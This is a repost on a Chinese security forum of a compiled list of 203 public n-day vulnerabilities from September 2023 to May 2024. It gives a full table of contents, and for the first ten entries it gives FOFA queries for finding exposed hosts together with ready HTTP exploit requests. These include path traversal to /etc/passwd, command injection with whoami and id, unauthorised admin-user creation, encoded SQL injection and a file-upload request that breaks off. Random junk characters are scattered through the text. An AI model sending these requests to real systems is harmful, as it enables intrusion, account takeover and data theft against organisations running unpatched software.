找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1909|回复: 0
打印 上一主题 下一主题

互联网公开漏洞整理202309-202406--转载

[复制链接]
跳转到指定楼层
楼主
发表于 2024-6-5 14:31:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
互联网公开漏洞整理202309-202406" H0 W6 Q1 `4 I( R3 w) n) O+ n
道一安全 2024-06-05 07:41 北京
) o* @* ^/ b, I/ u0 A) n以下文章来源于网络安全新视界 ,作者网络安全新视界1 |' R7 ?$ i  A3 ^: M
; _% b* S" I8 N! E; Z1 a3 X9 o' t
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
* T7 j. j4 r  x* c% E6 d# H
, h3 }3 j/ N$ K! ^* K' h) c漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
' A& ]+ |: A+ }* f2 d0 p
8 j' ]: a2 i/ J6 w1 K- j0 ^+ {8 L+ ^安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。% g1 A0 O8 C# N
% Y7 [3 H& O3 y
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。, A9 H& l/ x, Y
# S# ^( C; ^+ N# n, ]; f' H
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。2 X' a3 `' P- u3 Q: j) _

# V4 L: o- v$ {9 ~( _* s, E3 G/ Z; t; ~* a& N9 }0 X1 |. U
声明
9 |+ r, R. ^9 z/ ~* t
+ Q0 ^2 n  m  f# D为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。3 u% v# v7 u  _8 y1 t

. X& u* o4 ?3 R9 R有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。0 g* B0 B# S1 @9 o# v" F

3 `4 z( G, [* ?9 A
+ o; p) B! ~' P. e, h9 h! ]% C$ N* o" M, r2 |
目录) E( o8 M8 V! F' r# N# ~
! `8 N4 n3 _+ G9 J1 R. a6 P4 V
01
5 i3 K+ t  D( f2 v8 |# _- z2 S4 D1 M1 _9 p
1. StarRocks MPP数据库未授权访问
- X6 [7 S- Q- w' B4 h" z. f6 v3 a! N2. Casdoor系统static任意文件读取# W$ D1 e5 b3 \
3. EasyCVR智能边缘网关 userlist 信息泄漏+ R, v8 r# G# x. b% Q# R. a
4. EasyCVR视频管理平台存在任意用户添加, Q' y5 Z1 z) o7 F9 e) y% \
5. NUUO NVR 视频存储管理设备远程命令执行
0 E' Z; H8 ^$ e6. 深信服 NGAF 任意文件读取+ R* i  i6 b4 i5 i! U/ C
7. 鸿运主动安全监控云平台任意文件下载
% `+ \* S3 Z+ W4 T8. 斐讯 Phicomm 路由器RCE
. e( t3 |" F/ T' b2 M  u0 k7 Q9. 稻壳CMS keyword 未授权SQL注入
* ~% ^2 W8 @. q10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
8 Z! B. ~( g6 f. \: [3 b1 N# m11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入4 l7 o: ]+ r. u. R/ L9 h% @
12. Jorani < 1.0.2 远程命令执行$ X6 ~* L' U4 |
13. 红帆iOffice ioFileDown任意文件读取
& b, N8 S/ _: V# X$ V1 ^0 T$ i3 d7 J. k14. 华夏ERP(jshERP)敏感信息泄露9 }. I9 n! Q  N) m7 W7 s& W* w
15. 华夏ERP getAllList信息泄露
$ b9 x" T+ S! z3 D  [; T16. 红帆HFOffice医微云SQL注入
. U8 U: D. B5 Y& u8 e17. 大华 DSS itcBulletin SQL 注入
# }+ A% a6 Y" p18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
0 W" O4 S' g8 N) h19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
4 I0 ?! P- ?) n; H6 d/ e; L20. 大华ICC智能物联综合管理平台任意文件读取* c( @' \) F! G+ X: k
21. 大华ICC智能物联综合管理平台random远程代码执行( Z, P7 R4 Z9 Z6 P9 B6 S
22. 大华ICC智能物联综合管理平台 log4j远程代码执行7 @$ _4 e$ u8 `, N
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
# ]" }% I7 o/ j8 P9 ?24. 用友NC 6.5 accept.jsp任意文件上传+ B9 m1 }: C. w% W
25. 用友NC registerServlet JNDI 远程代码执行9 M& P7 S+ u! ]% B# _: X: }( d1 U5 _
26. 用友NC linkVoucher SQL注入$ k! N: }1 m6 u" R
27. 用友 NC showcontent SQL注入1 |; }  c, H# {: x: M5 v( R
28. 用友NC grouptemplet 任意文件上传- i0 W, `  x2 _: o- x
29. 用友NC down/bill SQL注入% Z& W0 d2 K6 }& G% i( [7 ?5 C" Y
30. 用友NC importPml SQL注入
; z  a- ]3 a" s5 [( s31. 用友NC runStateServlet SQL注入
& _' {; y  \  T! R9 |$ c( F! H9 [32. 用友NC complainbilldetail SQL注入6 J8 x6 u, V. x1 {2 {# J$ x
33. 用友NC downTax/download SQL注入
) X: o" V4 z0 H# o9 A2 C34. 用友NC warningDetailInfo接口SQL注入
8 o3 e; i$ \7 I$ \- f: g35. 用友NC-Cloud importhttpscer任意文件上传
! v+ a4 G* h2 _- |; M+ o$ ^* x+ [! C36. 用友NC-Cloud soapFormat XXE. ?. X, L4 F" _# T! t0 p  P$ v
37. 用友NC-Cloud IUpdateService XXE
- p8 S' o0 ]1 ]% c38. 用友U8 Cloud smartweb2.RPC.d XXE8 V9 B" a# @$ C0 k( E+ P* q
39. 用友U8 Cloud RegisterServlet SQL注入8 K3 D* ^7 q) F
40. 用友U8-Cloud XChangeServlet XXE6 _- P$ H5 `) `; F1 _+ Y% ?
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入9 s( C' U$ q, @8 Z1 O
42. 用友GRP-U8 SmartUpload01 文件上传1 N) U4 \; G: b3 k( {8 h' g
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
( ]1 _# ~. o$ m44. 用友GRP-U8 bx_dj_check.jsp SQL注入8 T! Q" C$ a% b9 Q5 b2 Q! M) q+ n( l
45. 用友GRP-U8 ufgovbank XXE  l" z8 w5 _9 m$ M! U
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
# ]. ]' {. Y2 j) ~! ~. V% q+ s) p6 A6 o9 z47. 用友GRP A++Cloud 政府财务云 任意文件读取
. _, v+ V' |4 O- `0 R" f0 X: {4 }48. 用友U8 CRM swfupload 任意文件上传" n$ ]& }  b; R6 K: ^
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
$ Y, N& ]" X, l50. QDocs Smart School 6.4.1 filterRecords SQL注入
; F3 I. Z- j7 q5 b3 R2 F51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入) l9 E7 p2 a4 w  A% S
52. 泛微E-Office json_common.php sql注入
0 z3 H/ Z1 L2 R$ k) D53. 迪普 DPTech VPN Service 任意文件上传
+ W9 V4 a4 W  I: d54. 畅捷通T+ getstorewarehousebystore 远程代码执行
' e0 M, H1 _' R; y3 A' I55. 畅捷通T+ getdecallusers信息泄露
# y9 L9 {' Y& ~% P, X* k56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE3 U4 A5 [  ?( j
57. 畅捷通T+ keyEdit.aspx SQL注入% M% {0 n# ]3 Z& V: l: `8 v
58. 畅捷通T+ KeyInfoList.aspx sql注入' v7 B) x. b$ e7 |0 Q( Y
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 H. Q( Y7 X  S: s  v0 S$ f60. 百卓Smart管理平台 importexport.php SQL注入
4 q: |* q8 R; z% _61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
; C3 m2 m& |& v62. IP-guard WebServer 远程命令执行1 P8 z+ B) I6 v3 s
63. IP-guard WebServer任意文件读取( v  ]) R* ~" b) D  x! A" l
64. 捷诚管理信息系统CWSFinanceCommon SQL注入  n" M5 f5 v; m6 |6 V$ I6 n  l
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
2 H! S) S! [' s66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
8 T9 }% P7 n' x) @67. 万户ezOFFICE wpsservlet任意文件上传( n7 R  S$ i: H) k2 M1 A
68. 万户ezOFFICE wf_printnum.jsp SQL注入
) B  L# O$ z1 H: B  j, M69. 万户 ezOFFICE contract_gd.jsp SQL注入. _: f6 A% o( x/ T" h
70. 万户ezEIP success 命令执行5 r) N: Z* s. v5 e
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入+ l9 R: u( {" d2 \
72. 致远OA getAjaxDataServlet XXE/ e# d4 q! l: b3 f& Y: \0 ]8 `3 g
73. GeoServer wms远程代码执行
, d1 U( A0 Y+ d' d" [, c. V! k& P74. 致远M3-server 6_1sp1 反序列化RCE, a4 o/ h$ M- w5 x2 t. X6 ?
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
, x6 f+ _6 @3 {) e9 T: L+ w76. 新开普掌上校园服务管理平台service.action远程命令执行+ g/ M4 M2 Q" S$ U3 }
77. F22服装管理软件系统UploadHandler.ashx任意文件上传0 [" O. i+ r" I) C! y% o7 j6 }
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
, K; O8 s: m1 r! z+ b" p( ~79. BYTEVALUE 百为流控路由器远程命令执行$ `, `8 ~3 R; Z' a# Q- S
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传% h7 J. q! n) ~4 Y. e
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
6 S& J0 {7 W1 U8 I- Y" L82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行" {, X& P- h1 w! ?
83. JeecgBoot testConnection 远程命令执行
6 Y  q- K8 v! r, B7 ?" U84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
0 t& G* R6 m+ j1 G6 p) D* g* r85. SysAid On-premise< 23.3.36远程代码执行5 e4 z8 d0 Q  J) G" c
86. 日本tosei自助洗衣机RCE
, E' m- M- x/ a+ J0 f2 p9 P5 Y87. 安恒明御安全网关aaa_local_web_preview文件上传: E- E2 W) M. s+ Q) k: w
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行7 \) G5 x  N5 l0 a& t
89. 致远互联FE协作办公平台editflow_manager存在sql注入9 u1 @- R8 a) r8 T
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行0 e# m7 x) }- z% D
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
6 i( ~1 H4 z( S' P% c% h92. 海康威视运行管理中心session命令执行
2 u0 A* U+ o+ g7 u  U93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
6 S# G  i* ~0 y+ s94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传4 ]4 ]* c* N0 N0 ]5 P
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
* m/ t/ Z7 m  C& D$ y; w96. Apache OFBiz  18.12.11 groovy 远程代码执行
  J& Y' U" [/ d) S97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
# Z# w; s9 H0 }9 h( _98. SpiderFlow爬虫平台远程命令执行
( m% F- d/ v( Q% R6 B5 A6 W& ]99. Ncast盈可视高清智能录播系统busiFacade RCE$ s' n3 H) f* o. Y' s3 t
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
, O& x- }7 L. h7 v2 T4 X/ b- J101. ivanti policy secure-22.6命令注入
8 J3 t! j6 f$ C& A" _7 v102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
3 |  f# O8 `) X# J# h4 Y, `103. Ivanti Pulse Connect Secure VPN XXE
/ t' v/ @  m& V8 ?5 F7 u104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
1 s8 Y5 E) y6 w1 s2 d105. SpringBlade v3.2.0 export-user SQL 注入" H' _: k* d5 y* `$ [
106. SpringBlade dict-biz/list SQL 注入
  U" W% _( F3 f107. SpringBlade tenant/list SQL 注入8 P2 u+ [* B( H. y
108. D-Tale 3.9.0 SSRF
6 W1 \8 K0 K8 [4 O7 \109. Jenkins CLI 任意文件读取
% F& v8 C# \0 |" f( ^$ Y' \) ?1 d110. Goanywhere MFT 未授权创建管理员
1 t' z" C, Q5 [5 c& ]' [1 _  M111. WordPress Plugin HTML5 Video Player SQL注入& @" e% D) Q! |7 m) l+ l
112. WordPress Plugin NotificationX SQL 注入- _% a7 ], u& a  c9 b, _) C5 J+ d" m" j
113. WordPress Automatic 插件任意文件下载和SSRF
7 n( h* `2 _+ G) s. G2 T  G114. WordPress MasterStudy LMS插件 SQL注入2 r" O4 @' f- J: A, Y8 r) h! h
115. WordPress Bricks Builder <= 1.9.6 RCE
; N/ y) ^0 c- w' g. {116. wordpress js-support-ticket文件上传6 t' [6 ~' v9 S: X% X
117. WordPress LayerSlider插件SQL注入+ v! V% p* R6 u/ ^4 R1 k. @7 v
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
/ y. C0 U7 V! Y+ V119. 北京百绰智能S20后台sysmanageajax.php sql注入
! G/ v& m( d8 @( e! o! W, ?120. 北京百绰智能S40管理平台导入web.php任意文件上传
/ `; F7 I) X2 D) [; @) Q121. 北京百绰智能S42管理平台userattestation.php任意文件上传
# {! w' x" b" h0 E# A122. 北京百绰智能s200管理平台/importexport.php sql注入
* c6 R+ m0 g; A123. Atlassian Confluence 模板注入代码执行
- q9 @8 d( \  U; j124. 湖南建研工程质量检测系统任意文件上传
$ R+ y% {' N# q( f/ W) p125. ConnectWise ScreenConnect身份验证绕过
- w9 `5 D4 t; x. f' z& i; Y& \; R126. Aiohttp 路径遍历
1 s5 @% y8 P) E' w6 R9 H127. 广联达Linkworks DataExchange.ashx XXE
/ O8 O( G$ ~0 I# {# }128. Adobe ColdFusion 反序列化
+ u2 X$ l& `, ?- [* I0 y$ `129. Adobe ColdFusion 任意文件读取
8 r* r9 L. b5 T: `- J130. Laykefu客服系统任意文件上传
9 i) a3 E8 b% K. r1 x131. Mini-Tmall <=20231017 SQL注入
2 m( F" Q7 k0 K132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
4 c+ h7 I$ I8 t) \" K# S& l133. H5 云商城 file.php 文件上传
- J7 H- @1 X- ?0 E& W134. 网康NS-ASG应用安全网关index.php sql注入# R! t4 q* V( r# X
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
0 U% o: H' f; o$ O/ x6 C. g  c136. NextChat cors SSRF
4 l" h: A8 Y1 Z5 ~$ r( k137. 福建科立迅通信指挥调度平台down_file.php sql注入# |& C8 W+ H1 ^" w$ M1 ]' s
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
( N: A9 @' J& ?: r+ F/ J, ~139. 福建科立讯通信指挥调度平台editemedia.php sql注入( b1 b5 C$ i) i5 A' O7 J% Q" J
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入5 p) Z: [8 \1 O0 r# k
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
6 `8 b/ w- o" u. V* _1 d142. CMSV6车辆监控平台系统中存在弱密码. [+ j) k$ ~2 p! f6 P- x9 N& `* S2 X
143. Netis WF2780 v2.1.40144 远程命令执行
* _6 ~3 m4 e3 C) ~144. D-Link nas_sharing.cgi 命令注入
  ^2 s: ?$ Q* U5 P145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
8 y4 N/ o3 w1 w; D% m) Q146. MajorDoMo thumb.php 未授权远程代码执行+ z* U" I, J* a" K
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历& k8 e/ C' J' Z4 z
148. CrushFTP 认证绕过模板注入, s& ?) {& {9 X5 H$ e
149. AJ-Report开源数据大屏存在远程命令执行3 ]7 \. x" b, a. J4 K% p. B9 M8 U
150. AJ-Report 1.4.0 认证绕过与远程代码执行
2 g  p8 Z4 A6 l151. AJ-Report 1.4.1 pageList sql注入
! a& W/ v( F. F& ]152. Progress Kemp LoadMaster 远程命令执行- H8 Z' W1 C4 O/ m
153. gradio任意文件读取
1 X; J9 A. r( u154. 天维尔消防救援作战调度平台 SQL注入
8 a0 Q: ?8 `4 Z155. 六零导航页 file.php 任意文件上传! A  G( U* H* ]' P: i
156. TBK DVR-4104/DVR-4216 操作系统命令注入: A; Q6 U8 x" {: u
157. 美特CRM upload.jsp 任意文件上传. Y: [; E9 ~( s& K+ f- m+ \
158. Mura-CMS-processAsyncObject存在SQL注入
1 J# d0 Y& U  l+ \3 f- x4 u% r159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
/ A% Y, t  {9 V- [: W% _160. Sonatype Nexus Repository 3目录遍历与文件读取6 m# d; i4 K% }* e8 {  g$ d; \& r
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
% w8 F, t' Q- k0 E; k* V$ m: ?162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
& d: b' I1 g+ c* W  d163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
) Z7 V. K9 c0 |164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
& U1 b2 w2 z, [( y. O165. OrangeHRM 3.3.3 SQL 注入# @# N$ \  v& H& Y$ J
166. 中成科信票务管理平台SeatMapHandler SQL注入
5 \$ t; {& F, E, j. j; j$ ]8 A167. 精益价值管理系统 DownLoad.aspx任意文件读取
5 D5 {9 q( V4 S; O* B* I168. 宏景EHR OutputCode 任意文件读取/ j8 M$ R$ W  R0 `9 a0 k
169. 宏景EHR downlawbase SQL注入+ \5 E  _7 @* R& |% N! G% t1 L! Q5 h- t
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
/ F) p; n" L- J( k, l171. 通天星CMSV6车载定位监控平台 SQL注入4 X% {4 w* s2 ]' c
172. DT-高清车牌识别摄像机任意文件读取5 b# P2 K, I9 l  c' |8 ?" b! L( Q
173. Check Point 安全网关任意文件读取
5 _( h' ?3 k* Z1 @1 Q2 q6 b174. 金和OA C6 FileDownLoad.aspx 任意文件读取" b1 [6 D# O$ K2 o
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
+ s; w- f% p2 Z3 Y4 l176. 电信网关配置管理系统 rewrite.php 文件上传3 k9 y' w, {2 Q
177. H3C路由器敏感信息泄露
4 C5 p+ m" T- }: m3 I9 R' h/ f- `  X178. H3C校园网自助服务系统-flexfileupload-任意文件上传
( [' l0 e* R* Z179. 建文工程管理系统存在任意文件读取: ]7 t( ]' Q/ W3 O6 w: ^9 l% N
180. 帮管客 CRM jiliyu SQL注入' A+ _, V6 \9 C: a! t2 ?7 \
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
$ e; @3 a- X* k8 x% O182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
; n% I& `" L3 j6 |$ Q' o183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
1 d$ s8 B" _8 R0 Z8 v184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加& u7 t7 m. l7 i) B
185. 瑞友天翼应用虚拟化系统SQL注入/ Q# U2 I2 `9 G  b" L4 E
186. F-logic DataCube3 SQL注入5 Z( ~  N$ h% J  x9 }* w) x. `
187. Mura CMS processAsyncObject SQL注入
  s4 Y) x7 ^3 j- ?$ G4 B3 d! ^2 b188. 叁体-佳会视频会议 attachment 任意文件读取# E6 T5 e1 o8 C/ l' C- M
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
5 j' f. _$ d$ B9 t% }190. 短视频矩阵营销系统 poihuoqu 任意文件读取
# |8 j  p5 I- `191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入) @- N& K- C' c: z4 ^( H# h3 I7 S' Z
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传4 j$ Z, ^3 z& F7 Z1 j( p/ @0 ~
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行7 l) u' }/ N5 Q6 h! o" |9 l
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传5 N0 X2 b& O- ^6 F* j; D- b- u
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行# w% y; J8 y& y* e6 j* X3 }
196. 河南省风速科技统一认证平台密码重置
1 B" A- j6 a9 W4 T197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
5 u; C% [4 p  L3 i7 o8 i8 `198.  阿里云盘 WebDAV 命令注入& u: ^0 W/ u5 P/ U9 T6 l  t
199. cockpit系统assetsmanager_upload接口 文件上传% U1 j9 ~( G3 C7 y+ L
200. SeaCMS海洋影视管理系统dmku SQL注入1 x: C: {- d' ]% \! _( d
201. 方正全媒体新闻采编系统 binary SQL注入
8 e( k6 p5 L) ?* d202. 微擎系统 AccountEdit任意文件上传* z& [' Y$ C# [( ?# e1 U! g
203. 红海云EHR PtFjk 文件上传4 F4 v7 g7 h* |: M, s

5 L4 Q' `3 G* I$ V$ XPOC列表* N- u9 H( G( n1 @

( N. k: v- S9 ]02' y" C9 F9 M; c# J4 {# z8 P. l

2 q+ W4 L% [- S5 y6 ~5 U) [3 H1. StarRocks MPP数据库未授权访问
/ I4 Q+ \2 [" G3 `  NFOFA :title="StarRocks"7 {; R9 U4 `& N0 j. q; z
GET /mem_tracker HTTP/1.1( J! a' M  x6 U0 C2 s0 a
Host: URL9 j% S! s- p4 x; i+ x

8 C+ U2 j5 {/ X  X/ K% H. R+ v2 X4 C7 B' o2 ~
2. Casdoor系统static任意文件读取! d6 q: y7 a4 |/ O1 S$ Q
FOFA :title="Casdoor"! e  U* x: N! u# o! K
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
8 I$ K8 H$ X7 i- [" p4 PHost: xx.xx.xx.xx:9999
+ O2 n' Y! \4 l6 r( c+ \& \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 [  P* n8 q: A$ r0 v1 |
Connection: close
) g: d/ c4 J- D# u% BAccept: */*3 B( q: I! }) q' v0 I) L- U9 a
Accept-Language: en3 ?# J+ e/ E( W  D& T
Accept-Encoding: gzip- z# V% U7 e/ U  O! V; F% Z
- ]# l5 N# w. q, M. R" [6 {
" L. B# R4 v0 t6 X- t
3. EasyCVR智能边缘网关 userlist 信息泄漏
3 ^1 I: e' p1 \  F* {6 t( P2 L% ?7 qFOFA :title="EasyCVR"
2 u* O+ ^. F+ _3 B! sGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1* e9 {5 N2 l* ^; O
Host: xx.xx.xx.xx8 E) Q* T4 f: M5 ]5 @0 u; _
( E" n/ m0 |5 g, X- E" u+ l$ }' I
; s) c. h0 Q. M7 a7 z9 H, s
4. EasyCVR视频管理平台存在任意用户添加8 \% P' u& a( F, G/ a4 H' h( Y
FOFA :title="EasyCVR"% P4 [, a# Y8 U* w. i$ ~

% d" N& B5 b" X/ o- kpassword更改为自己的密码md5
9 m5 F$ J* \& kPOST /api/v1/adduser HTTP/1.17 v, I8 t: y6 M) `) a
Host: your-ip
7 v/ ~1 b2 R4 n" ~! X/ WContent-Type: application/x-www-form-urlencoded; charset=UTF-8
* p+ C7 x4 z" H" b9 }! L" h- Y- G8 }  i! U1 V0 b( q4 A/ B
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1; C% }: h; {/ t4 ^: B$ }) _* K! [8 J! p
( R4 U6 v6 F* V5 p3 i/ p+ O
2 Z! Z8 F, r4 s2 x" ?) M
5. NUUO NVR 视频存储管理设备远程命令执行
  ~1 r% d2 W4 c; J2 Y0 wFOFA:title="Network Video Recorder Login"
: A1 G9 p% l4 C" X8 e  \GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1( g- l/ P" C- G  O# D9 a* k
Host: xx.xx.xx.xx& l( F8 R3 |2 A$ G

+ A8 ^1 M& e8 Z/ }3 R$ u, U. h8 q' q$ K; m% ]9 x7 t
6. 深信服 NGAF 任意文件读取! o" o- c6 T+ F8 y- T8 g# I' r
FOFA:title="SANGFOR | NGAF"
3 h4 Z. h, c. fGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
5 x( i' w$ Z$ p2 h, S1 ], KHost:
, V8 S1 l' o/ B, M
0 p9 j/ s1 h5 X  k! N$ B6 D0 p3 u) c, F
7. 鸿运主动安全监控云平台任意文件下载) |/ c1 f4 i' o- O# q6 r/ v/ `7 B- Q
FOFA:body="./open/webApi.html"
: P5 w# s5 r8 e$ PGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
* v% s/ N  J3 ?+ P4 Z9 LHost:
( N/ q! z) T$ q+ R  O, t+ G% P) l; z8 c4 |+ Q" Z  E, l, G
. e5 ?4 R- m7 ]2 d. e
8. 斐讯 Phicomm 路由器RCE
" K# s7 d% f( Z# a/ m3 VFOFA:icon_hash="-1344736688"' L/ a3 G& T5 v: n: L
默认账号admin登录后台后,执行操作
/ f  G5 n" |% \0 j& kPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
: j8 o. O) w2 l# I* kHost: x.x.x.x
$ g' w& c) X+ oCookie: sysauth=第一步登录获取的cookie
: i, c) S, R9 S9 w$ GContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
# f  ~: o5 [1 X2 HUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
# z- `$ S3 u" y. v; m5 {# T$ c6 s4 T1 {. r' C- `
------WebKitFormBoundaryxbgjoytz( `4 `: f6 S1 T* Y$ r3 D+ J
Content-Disposition: form-data; name="wifiRebootEnablestatus"" a! m0 ~' ~* A' u5 ?7 e
, r2 h% ~) v! h( t5 |
%s
0 ~; {9 b2 \+ k3 f% `, r------WebKitFormBoundaryxbgjoytz
1 ]# `2 a2 G, ~/ IContent-Disposition: form-data; name="wifiRebootrange"
0 ^! B* o* B/ _7 R# }/ g5 f% O
( Y4 k3 z5 _, A12:00; id;2 ]3 \& k, s4 {$ N% G' z: [4 l$ C
------WebKitFormBoundaryxbgjoytz
" V+ A" P( I7 FContent-Disposition: form-data; name="wifiRebootendrange"% m2 ~6 _, B2 ]# F8 j+ h% Z1 A
; n4 H8 z7 _: _2 z
%s:
" E+ F& g1 m' H4 e$ I$ k------WebKitFormBoundaryxbgjoytz
  P' \- N, i& Y$ j4 _  vContent-Disposition: form-data; name="cururl2"
* v0 R, [/ K2 l  Z9 C+ W7 ~- @7 f3 q0 Y. q. @& H' q

6 U2 |" {1 l7 Q------WebKitFormBoundaryxbgjoytz--
$ y  @0 ?6 g( n; x
3 x) R- J$ v0 C2 T( j8 `) g' K; i- }  c, j* D$ B5 h
9. 稻壳CMS keyword 未授权SQL注入
2 P: i" H) {! O  Q/ [7 t" s# P7 RFOFA:app="Doccms"
4 i' D+ M# k" A& E# ~GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.12 l3 n) t8 a% G  l( }& Z
Host: x.x.x.x
* g1 p6 C4 K" _7 ]
; t( K8 J) N. H3 B/ A3 p1 {3 J1 h' V' d& T* T0 |
payload为下列语句的二次Url编码% ?% }  u% e+ ~6 x5 k9 O
# l+ o$ k0 {# G$ o& }0 {$ |& [3 j
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#% E) ]3 l# s9 i# j/ F0 G4 N

! G! `, g8 L6 [2 A/ |: u10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
( Y/ F7 R9 E% tFOFA:icon_hash="953405444"  R' M- G' O* K( n: \. E7 S
- }# h; W  w8 O% @
文件上传后响应中包含上传文件的路径
! f; s7 ~3 r$ DPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
0 R2 H: n" v% r) o, Q1 E; `% qHost: x.x.x.x:xx
  t! t+ H) H* X+ pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36+ U2 k' D, @( Q) F4 ?
Content-Length: 197
/ `# y4 Z/ j5 w% t: c8 E) s4 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
# e! c9 N$ o4 |4 |5 ~) ?Accept-Encoding: gzip, deflate8 ^' ~- M1 \! s8 `& O3 C! c7 A
Accept-Language: zh-CN,zh;q=0.9
8 H! O4 e0 }4 V7 @6 `Connection: close5 ]% q/ Z/ a! K) }! T& ]( }, r' t( a
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu* d4 g- _1 Q' i0 i
2 T" q  h& @, P& a) R
------WebKitFormBoundaryxdgaqmqu
